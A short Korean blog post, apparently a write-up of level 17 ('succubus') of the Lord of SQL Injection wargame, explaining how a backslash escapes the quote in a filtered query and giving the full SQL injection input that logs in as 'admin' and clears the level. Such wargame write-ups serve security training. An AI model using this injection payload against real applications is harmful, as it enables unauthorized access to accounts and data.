los 17번1 [los.rubiya.kr] succubus #17 [succubus] 저번 문제와는 달리 preg_match를 통하여 문자열을 필터링 한다.여기서 preg_match 필터링을 피하기 위한 방법이 있는데 바로 \ 이다.\'를 하면 '는 일반 문자열이 된다.즉, ?id=\를 입력하면 구문은select id from prob_succubus where id='\' and pw='' 이 되고select id from prob_succubus where id='\' and pw='' 노란색으로 된 부분이 문자열이 되는것이다.?id=\&&pw=%20or%20id%20like%20"admin"%20--%20을 입력하면 clear! 2018. 9. 26. 이전 1 다음
